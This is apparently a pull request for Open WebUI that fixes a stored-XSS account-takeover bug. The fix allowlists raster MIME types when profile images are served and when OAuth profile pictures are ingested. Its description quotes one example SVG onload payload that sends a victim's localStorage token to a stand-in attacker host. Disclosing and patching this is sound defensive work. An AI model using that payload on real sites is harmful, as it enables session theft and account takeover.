### PR TITLE
fix: allowlist profile-image MIME at serving endpoint and OAuth ingestion

### DIFF
--- a/backend/open_webui/routers/users.py
+++ b/backend/open_webui/routers/users.py
@@ -496,16 +496,7 @@ async def get_user_profile_image_by_id(user_id: str, user=Depends(get_verified_u
                     image_buffer = io.BytesIO(image_data)
                     media_type = header.split(';')[0].lstrip('data:').lower()
 
-                    # Allowlist served MIME types. The data URI is stored
-                    # verbatim in the DB and could include `image/svg+xml`
-                    # (or other browser-executable types) if it was written
-                    # via a path that bypasses validate_profile_image_url
-                    # — e.g. the OAuth picture-claim ingestion path. Without
-                    # this gate, the SVG would render as a top-level
-                    # document on this same-origin endpoint and execute
-                    # embedded scripts (account-takeover XSS). Mirrors the
-                    # PNG/JPEG/GIF/WEBP allowlist enforced by
-                    # validate_profile_image_url on the form path.
+                    # Reject scriptable MIME (svg/html) regardless of how it got into the DB.
                     if media_type not in {'image/png', 'image/jpeg', 'image/gif', 'image/webp'}:
                         return FileResponse(f'{STATIC_DIR}/user.png')
 

--- a/backend/open_webui/routers/users.py
+++ b/backend/open_webui/routers/users.py
@@ -494,12 +494,28 @@ async def get_user_profile_image_by_id(user_id: str, user=Depends(get_verified_u
                     header, base64_data = user.profile_image_url.split(',', 1)
                     image_data = base64.b64decode(base64_data)
                     image_buffer = io.BytesIO(image_data)
-                    media_type = header.split(';')[0].lstrip('data:')
+                    media_type = header.split(';')[0].lstrip('data:').lower()
+
+                    # Allowlist served MIME types. The data URI is stored
+                    # verbatim in the DB and could include `image/svg+xml`
+                    # (or other browser-executable types) if it was written
+                    # via a path that bypasses validate_profile_image_url
+                    # — e.g. the OAuth picture-claim ingestion path. Without
+                    # this gate, the SVG would render as a top-level
+                    # document on this same-origin endpoint and execute
+                    # embedded scripts (account-takeover XSS). Mirrors the
+                    # PNG/JPEG/GIF/WEBP allowlist enforced by
+                    # validate_profile_image_url on the form path.
+                    if media_type not in {'image/png', 'image/jpeg', 'image/gif', 'image/webp'}:
+                        return FileResponse(f'{STATIC_DIR}/user.png')
 
                     return StreamingResponse(
                         image_buffer,
                         media_type=media_type,
-                        headers={'Content-Disposition': 'inline'},
+                        headers={
+                            'Content-Disposition': 'inline',
+                            'X-Content-Type-Options': 'nosniff',
+                        },
                     )
                 except Exception as e:
                     pass

--- a/backend/open_webui/utils/oauth.py
+++ b/backend/open_webui/utils/oauth.py
@@ -1456,12 +1456,25 @@ class OAuthManager:
             async with aiohttp.ClientSession(trust_env=True) as session:
                 async with session.get(picture_url, **get_kwargs, ssl=AIOHTTP_CLIENT_SESSION_SSL) as resp:
                     if resp.ok:
+                        # Trust the upstream Content-Type rather than
+                        # guessing from the URL extension. Then allowlist
+                        # to the same raster image MIMEs accepted on the
+                        # form path (validate_profile_image_url). Without
+                        # this, a `.svg` URL — or a controlled host
+                        # serving any payload with a Content-Type the URL
+                        # extension doesn't expose — would land in the DB
+                        # as `data:image/svg+xml;base64,...` and execute
+                        # as a top-level document when later served.
+                        upstream_content_type = (resp.headers.get('Content-Type') or '').split(';')[0].strip().lower()
+                        if upstream_content_type not in {'image/png', 'image/jpeg', 'image/gif', 'image/webp'}:
+                            log.warning(
+                                f'Rejecting profile picture from {picture_url}: '
+                                f'disallowed Content-Type {upstream_content_type!r}'
+                            )
+                            return '/user.png'
                         picture = await resp.read()
                         base64_encoded_picture = base64.b64encode(picture).decode('utf-8')
-                        guessed_mime_type = mimetypes.guess_type(picture_url)[0]
-                        if guessed_mime_type is None:
-                            guessed_mime_type = 'image/jpeg'
-                        return f'data:{guessed_mime_type};base64,{base64_encoded_picture}'
+                        return f'data:{upstream_content_type};base64,{base64_encoded_picture}'
                     else:
                         log.warning(f'Failed to fetch profile picture from {picture_url}')
                         return '/user.png'

--- a/backend/open_webui/utils/oauth.py
+++ b/backend/open_webui/utils/oauth.py
@@ -1456,15 +1456,7 @@ class OAuthManager:
             async with aiohttp.ClientSession(trust_env=True) as session:
                 async with session.get(picture_url, **get_kwargs, ssl=AIOHTTP_CLIENT_SESSION_SSL) as resp:
                     if resp.ok:
-                        # Trust the upstream Content-Type rather than
-                        # guessing from the URL extension. Then allowlist
-                        # to the same raster image MIMEs accepted on the
-                        # form path (validate_profile_image_url). Without
-                        # this, a `.svg` URL — or a controlled host
-                        # serving any payload with a Content-Type the URL
-                        # extension doesn't expose — would land in the DB
-                        # as `data:image/svg+xml;base64,...` and execute
-                        # as a top-level document when later served.
+                        # Trust upstream Content-Type, allowlist to raster MIMEs (URL extension can lie).
                         upstream_content_type = (resp.headers.get('Content-Type') or '').split(';')[0].strip().lower()
                         if upstream_content_type not in {'image/png', 'image/jpeg', 'image/gif', 'image/webp'}:
                             log.warning(


### PR DESCRIPTION
Two layers of the profile-image pipeline trusted attacker-controllable MIME information and could re-serve `image/svg+xml` (a browser-executable type) as a top-level document under `Content-Disposition: inline`, yielding stored-XSS / account-takeover when a victim opened the URL:

1. `get_user_profile_image_by_id` in `backend/open_webui/routers/users.py` read the `data:<mime>;base64,...` prefix off the stored `profile_image_url` and reflected `<mime>` straight into `StreamingResponse(media_type=...)`. Anything in the DB whose MIME was not png/jpeg/gif/webp — for example anything written through a path that bypasses `validate_profile_image_url` — was served verbatim.

2. `_process_picture_url` in `backend/open_webui/utils/oauth.py` fetched the OAuth `picture` claim URL and inferred the MIME from the URL extension via `mimetypes.guess_type(picture_url)[0]`, then stored `data:<inferred>;base64,...` in the user's `profile_image_url`. The inferred MIME was never compared against an allowlist, and the upstream `Content-Type` response header was discarded. A `.svg` picture URL produced `data:image/svg+xml;base64,...` in the database; the OAuth write path (`Users.update_user_profile_image_url_by_id` / `Auths.insert_new_auth`) does not run through the Pydantic `validate_profile_image_url` validator, so the SVG MIME is not caught on the way in either.

Combined effect: a verified user authenticating via OAuth with a controlled IdP picture URL could store an SVG-MIME data URI in their own profile, then share `/api/v1/users/{id}/profile/image` to any authenticated victim. The browser rendered the SVG as a top-level document under the application's same origin and executed embedded script handlers (e.g. `onload="fetch('https://attacker/x?c='+ localStorage.getItem('token'))"`).

Two fixes, defense-in-depth:

- `get_user_profile_image_by_id`: lower-case the parsed `media_type` and reject anything outside `{image/png, image/jpeg, image/gif, image/webp}` before building the StreamingResponse — fall through to the default `user.png` instead. Adds `X-Content-Type-Options: nosniff` on the success path so a browser cannot MIME-sniff its way back to a scriptable type. This single change closes the XSS exploitation regardless of what is stored in the DB or how it got there.

- `_process_picture_url`: replace the URL-extension MIME guess with the upstream `Content-Type` response header, then allowlist to the same raster image MIMEs the form path accepts. If the upstream serves anything else (or omits Content-Type), fall back to the default `/user.png` and log. This stops the bad data from landing in the DB in the first place, keeps the data layer clean, and means a future refactor that drops the serving-endpoint allowlist still cannot reintroduce the vulnerability via OAuth.

Form-input writes were already protected by `validate_profile_image_url` (SVG explicitly excluded — see `backend/open_webui/utils/validate.py:16` "SVG is intentionally excluded: it can carry embedded scripts"). The gap was the bypass paths; this PR closes them.

### Contributor License Agreement

<!--
🚨 DO NOT DELETE THE TEXT BELOW 🚨
Keep the "Contributor License Agreement" confirmation text intact.
Deleting it will trigger the CLA-Bot to INVALIDATE your PR.

Your PR will NOT be reviewed or merged until you check the box below confirming that you have read and agree to the terms of the CLA.
-->

- [x] By submitting this pull request, I confirm that I have read and fully agree to the [Contributor License Agreement (CLA)](https://github.com/open-webui/open-webui/blob/main/CONTRIBUTOR_LICENSE_AGREEMENT), and I am providing my contributions under its terms.

> [!NOTE]
> Deleting the CLA section will lead to immediate closure of your PR and it will not be merged in.
